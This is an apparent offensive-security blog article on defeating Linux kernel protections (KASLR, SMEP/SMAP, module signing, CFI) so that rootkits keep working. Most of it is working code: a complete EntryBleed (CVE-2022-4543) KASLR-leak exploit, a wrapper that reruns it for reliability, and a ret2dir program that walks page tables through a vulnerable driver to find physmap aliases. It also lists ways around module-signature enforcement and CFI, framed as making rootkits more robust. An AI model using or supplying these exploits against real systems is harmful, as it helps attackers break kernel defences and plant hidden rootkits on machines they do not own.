lights off & black0ut on
1- Introduction
Hello, Welcome!!!
In this article, I will discuss how modern protections in the Linux Kernel hinder and mitigate rootkit functionalities, and of course, how to bypass them.
2- Kernel Address Space Layout Randomization (KASLR)
KASLR is one of the kernel’s primary defense mechanisms: it randomizes the base address at which the kernel is loaded on each boot, making exploitation more difficult for attackers. For rootkits, this is problematic because the address of the sys_call_table changes on every boot, so syscall hooks can no longer rely on hardcoded addresses.
There are several ways to bypass KASLR; one of them is CVE-2022-4543, also known as EntryBleed. It is a vulnerability in the Kernel Page Table Isolation (KPTI) mechanism of Linux that allows a local attacker to leak the KASLR base address on Intel systems. The flaw exploits a timing-based side channel in the TLB (Translation Lookaside Buffer). With KPTI enabled, the entry_SYSCALL_64 code must stay mapped in the user page tables at the same virtual address it has in the kernel page tables. By timing prefetchnta and prefetcht2 on candidate addresses right after a syscall, an attacker can tell which address is mapped and therefore where entry_SYSCALL_64 lives; subtracting its known offset yields the kernel base. This vulnerability primarily affects Intel processors. Below is an exploit for this vulnerability:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h> /* syscall() */
uint64_t sidechannel(uint64_t addr)
{
uint64_t a, b, c, d;
asm volatile(".intel_syntax noprefix;"
"mfence;"
"rdtscp;"
"mov %0, rax;"
"mov %1, rdx;"
"xor rax, rax;"
"lfence;"
"prefetchnta qword ptr [%4];"
"prefetcht2 qword ptr [%4];"
"xor rax, rax;"
"lfence;"
"rdtscp;"
"mov %2, rax;"
"mov %3, rdx;"
"mfence;"
".att_syntax;"
: "=r"(a), "=r"(b), "=r"(c), "=r"(d)
: "r"(addr)
: "rax", "rbx", "rcx", "rdx");
a = (b << 32) | a;
c = (d << 32) | c;
return c - a;
}
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
uint64_t leak_syscall_entry(unsigned long long offset)
{
unsigned long long STEP = 0x100000ull;
unsigned long long SCAN_START = 0xffffffff80000000ull + offset, SCAN_END = 0xffffffffc0000000ull + offset;
unsigned long long ARR_SIZE = (SCAN_END - SCAN_START) / STEP;
/* calloc zeroes the buffer; the loop below accumulates into it with += */
uint64_t *data = (uint64_t *)calloc(ARR_SIZE, sizeof(uint64_t));
uint64_t min = ~0, addr = ~0;
for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
{
for (uint64_t idx = 0; idx < ARR_SIZE; idx++)
{
uint64_t test = SCAN_START + idx * STEP;
syscall(104);
uint64_t time = sidechannel(test);
if (i >= DUMMY_ITERATIONS)
data[idx] += time;
}
}
for (int i = 0; i < ARR_SIZE; i++)
{
data[i] /= ITERATIONS;
if (data[i] < min)
{
min = data[i];
addr = SCAN_START + i * STEP;
}
}
return addr;
}
int main(int argc, char **argv)
{
if (argc != 2)
{
puts("[*] Usage: ./binary entry_SYSCALL_64_offset(in hex)");
return -1;
}
char *p_end;
unsigned long long entry_SYSCALL_64_offset = strtoull(argv[1], &p_end, 16);
printf("%llx", leak_syscall_entry(entry_SYSCALL_64_offset) - entry_SYSCALL_64_offset);
return 0;
}
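A single run of the side channel is not always reliable, so the following C++ wrapper runs the leak binary repeatedly and prints the most frequently reported base address:
#include <stdio.h>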
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <iostream>
#include <fstream>
#include <string>
#include <map>
using namespace std;
void execute_cmd(const char *cmd, char *result)
{
char buf_ps[1024];
char ps[1024] = {0};
FILE *ptr;
strcpy(ps, cmd);
if ((ptr = popen(ps, "r")) != NULL)
{
while (fgets(buf_ps, 1024, ptr) != NULL)
{
strcat(result, buf_ps);
if (strlen(result) > 1024)
break;
}
pclose(ptr);
ptr = NULL;
}
else
{
printf("popen %s error\n", ps);
}
}
int main(int argc, char **argv)
{
if (argc != 4)
{
puts("[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop");
return -1;
}
string dekaslr_path = argv[1];
string koffset = argv[2];
string max_loop = argv[3];
string cmd = dekaslr_path + " " + koffset;
char result[0x1000] = {0};
int max_tries = stoi(max_loop);
map<string, unsigned int> base_record;
for (size_t i = 0; i < max_tries; i++)
{
memset(result, 0, sizeof(result)); // clear the whole buffer, not just the first 0x100 bytes
execute_cmd(cmd.c_str(), result);
// printf("%s\n", result);
string key = result;
if (base_record.find(key) != base_record.end())
{
base_record[key]++;
}
else
{
base_record[key] = 1;
}
}
map<string, unsigned int>::iterator iter;
unsigned int max_cnt = 0;
for (iter = base_record.begin(); iter != base_record.end(); iter++)
{
if (iter->second > max_cnt)
{
max_cnt = iter->second;
}
}
string kernel_base;
for (iter = base_record.begin(); iter != base_record.end(); iter++)
{
if (iter->second == max_cnt)
{
kernel_base = iter->first;
cout << "0x" << kernel_base << ": " << max_cnt << "/" << max_tries << endl;
break;
}
}
return 0;
}
3- Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP)
SMEP and SMAP are hardware (CPU) security mechanisms that protect the kernel from attacks exploiting the interaction between privileged (kernel mode) and non-privileged (user mode) memory.
SMEP prevents the kernel from executing code located in userland memory, blocking attacks that redirect kernel execution to malicious code residing in non-privileged regions. On x86_64 it is controlled by bit 20 of the CR4 register. If enabled, the CPU raises a page fault (#PF) when the kernel tries to fetch instructions from memory pages marked as “userland” (non-privileged). Page marking: the User/Supervisor bit (bit 2) in the Page Table Entry (PTE) defines whether a page belongs to the user (U=1) or the kernel (U=0). This complicates rootkits because it blocks shellcode placed in userland and forces them to use more complex techniques like ROP.
SMAP blocks kernel access to userland memory pages during privileged operations, preventing user-controlled data from being used to corrupt kernel structures or leak sensitive information. It is enabled by bit 21 of CR4. How does it work at the low level?
stac (Set AC Flag): Temporarily allows access to userland (used in functions like copy_from_user).
clac (Clear AC Flag): Restores SMAP protection.
AC Flag: When SMAP is active, the CPU checks the AC flag (bit 18 in the RFLAGS register). If AC=0, userland accesses are blocked.
For rootkits, this is terrible because it prevents them from using userland data to manipulate the kernel and hinders memory corruption attacks that rely on user-controlled pointers.
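One way to bypass these systems is ret2dir (return-to-direct-mapped memory). The kernel keeps a direct mapping of physical memory, the physmap, so every physical page backing a userland allocation also has an alias (synonym) at a kernel virtual address. The attacker allocates multiple pages in userland via mmap and fills them with a payload; the same bytes are then reachable through the physmap alias. This is useful because SMEP and SMAP only check pages marked as user pages, and physmap addresses are supervisor pages. Note that current kernels map the physmap as non-executable, so the alias is typically used to hold data such as a ROP chain rather than shellcode. Below is an example that, through a deliberately vulnerable driver (/dev/vuln) exposing kernel read/write, walks the page tables to locate the physmap synonym of two user pages and prints their PTEs: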
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>    /* memset() */
#include <fcntl.h>     /* open(), O_RDONLY */
#include <sys/ioctl.h> /* ioctl() */
#include <sys/mman.h>
#include <sys/stat.h>
#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444
struct rwRequest {
void *kaddr;
void *uaddr;
size_t length;
};
unsigned long pageOffsetBase = 0xffff888000000000;
int Open(char *fname, int mode) {
int fd;
if ((fd = open(fname, mode)) < 0) {
perror("open");
exit(-1);
}
return fd;
}
void write64(unsigned long kaddr, unsigned long value) {
struct rwRequest req;
unsigned long value_ = value;
req.uaddr = &value_;
req.length = 8;
req.kaddr = (void *)kaddr;
int fd = Open("/dev/vuln", O_RDONLY);
if (ioctl(fd, VULN_WRITE, &req) < 0) {
perror("ioctl");
exit(-1);
}
}
unsigned long read64(unsigned long kaddr) {
struct rwRequest req;
unsigned long value;
req.uaddr = &value;
req.length = 8;
req.kaddr = (void *)kaddr;
int fd = Open("/dev/vuln", O_RDONLY);
if (ioctl(fd, VULN_READ, &req) < 0) {
perror("ioctl");
exit(-1);
}
return value;
}
unsigned long leak_stack() {
struct rwRequest req;
unsigned long stack;
int fd = Open("/dev/vuln", O_RDONLY);
req.uaddr = &stack;
if (ioctl(fd, VULN_STACK, &req) < 0) {
perror("ioctl");
exit(-1);
}
return stack;
}
unsigned long leak_pgd() {
struct rwRequest req;
unsigned long pgd = 0xcccccccc;
int fd = Open("/dev/vuln", O_RDONLY);
req.uaddr = &pgd;
if (ioctl(fd, VULN_PGD, &req) < 0) {
perror("ioctl");
exit(-1);
}
return pgd;
}
unsigned long find_synonym(unsigned long pgdir, unsigned long vaddr) {
unsigned long index1 = (vaddr >> 39) & 0x1ff;
unsigned long index2 = (vaddr >> 30) & 0x1ff;
unsigned long index3 = (vaddr >> 21) & 0x1ff;
unsigned long index4 = (vaddr >> 12) & 0x1ff;
printf("index1: %lx, index2: %lx, index3: %lx index4: %lx\n", index1, index2, index3, index4);
unsigned long lv1 = read64(pgdir + index1*8);
if (!lv1) {
printf("[!] lv1 is invalid\n");
exit(-1);
}
printf("lv1: %lx\n", lv1);
unsigned long lv2 = read64((((lv1 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index2*8);
if (!lv2) {
printf("[!] lv2 is invalid\n");
exit(-1);
}
printf("lv2: %lx\n", lv2);
unsigned long lv3 = read64((((lv2 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index3*8);
if (!lv3) {
printf("[!] lv3 is invalid\n");
exit(-1);
}
printf("lv3: %lx\n", lv3);
unsigned long lv4 = read64((((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8);
if (!lv4) {
printf("[!] lv4 is invalid\n");
exit(-1);
}
printf("lv4: %lx\n", lv4);
unsigned long vaddr_alias = (((lv4 >> 12) & 0x3fffffff) << 12) + pageOffsetBase;
return vaddr_alias;
}
unsigned long pageTableWalk(unsigned long pgdir, unsigned long vaddr) {
unsigned long index1 = (vaddr >> 39) & 0x1ff;
unsigned long index2 = (vaddr >> 30) & 0x1ff;
unsigned long index3 = (vaddr >> 21) & 0x1ff;
unsigned long index4 = (vaddr >> 12) & 0x1ff;
printf("index1: %lx, index2: %lx, index3: %lx index4: %lx\n", index1, index2, index3, index4);
unsigned long lv1 = read64(pgdir + index1*8);
if (!lv1) {
printf("[!] lv1 is invalid\n");
exit(-1);
}
printf("lv1: %lx\n", lv1);
unsigned long lv2 = read64((((lv1 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index2*8);
if (!lv2) {
printf("[!] lv2 is invalid\n");
exit(-1);
}
printf("lv2: %lx\n", lv2);
unsigned long lv3 = read64((((lv2 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index3*8);
if (!lv3) {
printf("[!] lv3 is invalid\n");
exit(-1);
}
printf("lv3: %lx\n", lv3);
unsigned long lv4 = read64((((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8);
if (!lv4) {
printf("[!] lv4 is invalid\n");
exit(-1);
}
printf("lv4: %lx\n", lv4);
unsigned long vaddr_alias = (((lv4 >> 12) & 0x3fffffff) << 12) + pageOffsetBase;
printf("vaddr alias page: %p\n", (void *)vaddr_alias);
unsigned long pte_addr = (((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8;
printf("pte address: %p\n", (void *)pte_addr);
return pte_addr;
}
int main (int argc, char **argv){
void *rwx = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (rwx == MAP_FAILED) {
perror("mmap");
exit(-1);
}
void *rw = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (rw == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memset(rwx, 0xcc, 0x1000);
memset(rw, 0xcc, 0x1000);
unsigned long pgd = leak_pgd();
printf("[*] page directory is at: %p\n", (void *)pgd);
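/* find_synonym() takes an address as unsigned long, so cast the mmap pointers explicitly */
unsigned long rwx_pte = pageTableWalk(pgd, find_synonym(pgd, (unsigned long)rwx));
unsigned long rw_pte = pageTableWalk(pgd, find_synonym(pgd, (unsigned long)rw));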
printf("[*] RWX: %lx\n", read64(rwx_pte));
printf("[*] RW : %lx\n", read64(rw_pte));
return 0;
}
4- Kernel Module Signatures
Kernel Module Signature verification (typically using SHA-512 as the hash) is a security mechanism built into Linux that, when enforcement is enabled, ensures only kernel modules (.ko files) digitally signed by a trusted key can be loaded. This feature is essential to prevent the injection of malicious code (such as rootkits) or unauthorized modules into the kernel, especially on systems with Secure Boot enabled.
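Bypass methods include:
Secure Boot Disabled: When signature enforcement is off (CONFIG_MODULE_SIG_FORCE is unset and Secure Boot is not putting the kernel in lockdown), unsigned modules can still be loaded via insmod; the kernel is only marked as tainted.
Custom Keys: Systems can trust local keys, either built into the kernel at compile time or, on distributions that use shim, enrolled as a Machine Owner Key (MOK).
Vulnerable Code: Installing a signed driver with exploitable vulnerabilities, essentially installing a security flaw on the machine, or exploiting a kernel bug such as CVE-2021-3490 (an eBPF verifier flaw).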
5- Control Flow Integrity (CFI)
Control Flow Integrity (CFI) is a security mechanism designed to protect programs and systems from exploits that derail the legitimate execution flow, such as Return-Oriented Programming (ROP) and Jump-Oriented Programming (JOP). It ensures that control flow (function calls, returns, jumps) follows only predefined valid paths, thus preventing attackers from hijacking execution for malicious code. The following techniques exist to bypass this system:
- A. Attacks on “Coarse-Grained” Implementations
Problem: Coarse-grained CFI groups many valid destinations into broad categories.
Example: If all functions returning int are considered valid, an attacker can redirect execution to any of them.
Affected Tools: Older versions of Clang CFI and Microsoft CFG.
- B. Memory Corruption Primitive + CFI Weakening
Mechanism: Combining memory corruption (e.g., buffer overflow) with flaws in CFI.
Example: Corrupting a data structure (e.g., struct file_operations) to redirect flow to gadgets permitted by CFI.
Case: WarpAttack used double-fetches (double memory accesses) to create race conditions and bypass checks.
- C. ROP/JOP Within Allowed Boundaries
Mechanism: Constructing ROP/JOP chains using only gadgets in regions marked as valid by CFI.
Example: Counterfeit Object-Oriented Programming (COOP) uses legitimate object calls to achieve malicious goals.
- D. Abuse of APIs or Legitimate Functions
Mechanism: Calling valid system functions with manipulated arguments.
Example: Using system() or execve() with attacker-controlled parameters.
This allows for a more sophisticated and robust rootkit.
6- Conclusion
In conclusion, kernel hacking is an extremely vast field, with an ongoing war between increasingly sophisticated defenses and attackers. The content presented here covers some techniques to bypass Linux Kernel defenses, but there are countless other methods. That’s it, thank you very much!
lights on & black0ut out